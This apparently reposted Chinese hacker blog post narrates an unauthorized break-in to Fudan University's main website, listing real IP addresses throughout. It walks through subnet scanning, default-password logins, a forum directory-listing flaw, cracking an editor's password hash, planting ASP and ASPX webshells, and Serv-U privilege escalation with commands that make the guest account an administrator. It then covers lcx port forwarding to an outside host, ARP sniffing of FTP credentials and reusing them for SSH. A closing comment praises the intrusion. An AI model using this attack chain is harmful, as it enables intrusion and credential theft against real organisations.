转载自:L04sblog
一、师出有名
某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。
二、战略部署
这次要拿的是复旦主站,分站可不是我们的目标了,嘿嘿。要不然拿个分站就挂上复旦的名义似乎有点说不过去。通过google顺利找到复旦大学主站:http://www.fudan.edu.cn/,如图1。
PHP的程序,打开了个链接,顺手加个单撇号,提示"警告!提交的数据非法!",又试了几个其他的注入关键字,都被过滤掉了。看来直接从主站下手难度比较大,所以我们得想点其他办法。这里我打算利用嗅探来获取目标站的重要信息,嘿嘿。我们都知道可以根据ping一个目标地址的TTL值来大致判断对方的服务器操作系统!我ping了一下复旦主站,发现TTL值为53,如图2。
这个数值大致就是Linux的操作系统的了,嘿嘿。要想嗅探就必须要取得与目标服务器同一网段下的某台服务器权限,然后再安装嗅探工具进行嗅探攻击。复旦主站的IP为:61.129.42.5,那我们就必须在61.129.42.*这个网段里先控制一台服务器!先用SuperScan3.0扫描整个C段的21端口,作用就是先看看有没有windows操作系统的服务器在这个网段里!至于为什么要扫21嘛,大家都清楚要是装了Serv-U的话要是没什么意外,提权应该是比较容易的嘛,嘿嘿。扫描结果出来了,有好几台装有Serv-U的,按经验,装了Serv-U的就肯定是windows系统的了!IP为61.129.42.42这台明显就是windows的系统,Serv-U的版本是6.3的,如图3。
0
三、步步为营
现在目的很明确,就是要先控制住61.129.42.42这台服务器!在浏览器里面填入IP访问,发现页面有点难看,都是些doc文档下载的东西,对我们来说没什么用。我们可以通过查询域名绑定看看有些什么站在上面。我一般不用明小子查询,因为用它能查出来的已经很少了!用X以前介绍过的一个网站来查询吧,它查出来的比明小子查的数据要多且准!打开 http://www.seologs.com/ip-domains.html,在"Domain or IP address"里填上"61.129.42.42",然后点击"submit"提交,稍等一会就会返回查询结果的了,如图4。
只有两个,似乎不容乐观哦。居然打开两个都不能访问!后来访问了一下8000端口才有反应了,如图5。
光在这里面也看不出什么来,页面比较简单,可利用的地方不多。值得庆幸的是有个"在线论坛",打开看看,原来是动网的,嘿嘿。用默认的用户名和密码尝试登录,居然成功了进入了后台,如图6。
本以为可以很轻松的拿到webshell的,没想到这个破论坛既不能上传也不能备份!动网没了这两个功能基本上比较难拿到webshell了,郁闷!于是又上了邪恶八进制发帖讨论,没多久就在回复里面看到动网还有个后台列文件的漏洞!嘿嘿,这回似乎又有得搞了!大致方法就是在"基本设置"里修改"上传目录设定",然后到"上传文件管理"里面去查看结果。列了N久终于发现有可利用的东西了,如图7。
ewebeditor出现了,嘿嘿。点击打开后台登录页面,如图8。
尝试默认的用户名和密码发现无法登录进去,看来密码改过了。没关系,反正我们能列文件嘛。再利用动网列文件的漏洞找到了ewebeditor的数据库文件,下载回来,用明小子的数据库管理功能打开,查看了管理员密码的MD5散列,如图9。
再到MD5查询网站查询密码,幸运的是密码并不复杂,顺利查了出来,如图10。
用得到的用户名和密码成功登录了ewebeditor的后台,如图11。
进了ewebeditor拿webshell就比较轻松的了。样式管理-拷贝样式-设置-添加允许上传类型asa,再预览上传asa后缀的ASP马,然后在"上传文件管理"里就可以看到马的了,点击直接访问webshell,如图12。
在图12里面,我们可以看到有ASPNET这个用户,一般来说很有可能支持ASPX,因为ASPX马的权限一般要比ASP的高。所以我上传了一个ASPX马。然后再传了一个SU提权的ASP马,执行:"net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三条命令,意思是先激活guest用户,再给guest用户设定一个密码,再把guest用户添加进管理员组。幸运的是Serv-U的默认连接密码没有改,命令都成功执行了。在ASPX马里执行:"net user guest"我们可以发现guest已经隶属于管理员组了,如图13。
用ASPX马读取了注册表的远程桌面服务端口,发现就是默认的3389,不过Terminal Services服务当时是没有开的。后来wyzhack放了鸽子才给开了,嘿嘿。
四、守株待兔
直接连接3389是行不通的,防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用ASPX马或者SU提权马发现都不能执行lcx.exe进行转发,所以我想通过修改Serv-U的配置文件来添加一个具体system权限的FTP用户,再登录上去进行端口转发。就是修改C:Program FilesServ-UServUDaemon.ini这个文件的内容啦。如何修改我就不废话了,有兴趣的话大家可以去了解下SU配置文件的存放规则,了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的,拥有system权限的FTP用户。要是配置文件没有权限修改的话,可以用SU提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了,不过cacls.exe需要文件格式为NTFS的才可以使用哦。在CMD下登录FTP上去,执行:
C:Documents and SettingsAll UsersDocumentslcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本机执行:
lcx.exe -listen 51 2007
然后连接本机的的2007端口就可以登录远程服务器了,如图14。
到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了,具体请参照我的另一篇关于嗅探入侵的文章。在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1,如图15。
复旦主站的IP为:61.129.42.5。设置好cain就可以开始嗅探攻击了,嘿嘿。由于一开始的那几天是五一假期时间,嗅了两天一无所获。N天之后终于有进展了,wyzhack告诉我已经成功嗅探到复旦主站的FTP用户名和密码了,如图16。
对于一个网站,有了FTP密码就等于有了一切!利用FTP上传了一个PHP马,进去参观一下,如图17。
五、尘埃落定
到这里就已经完全控制了复旦大学的主站了!虽然主站的操作系统是Linux,但是我们通过先控制一台windows的3389肉鸡再进行对目标的嗅探攻击收到了如期的效果。可见嗅探攻击的威力的确非比寻常,不注意这方面的防范也必将被人恶意入侵!既然是Linux的系统,管理员一般都是用SSH来远程管理服务器的,嘿嘿。扫描一下主站服务器,发现开了22端口(SSH的默认连接端口为22)尝试用嗅到的FTP用户名和密码登录SSH居然成功了,如图18。
至于通过溢出或者其他提权方法来得到root权限,我就不弄了,因为这方面实在不太熟悉。本文主要是介绍一种入侵思路,没有什么技术含量。不得不说的一句话:管理员们要小心嗅探攻击了,嗅探的攻击力可是比较厉害的。如有不妥之处还请大家批评斧正!
===========================
作者思路很清晰。运气很好啊。。。遇见没改密码的动网论坛。。
亮点算是能在论坛后台列目录吧。。顺利的列出了ewe编辑器后台以及数据库地址。可怜的ewe编辑器不知道害死了多少站长。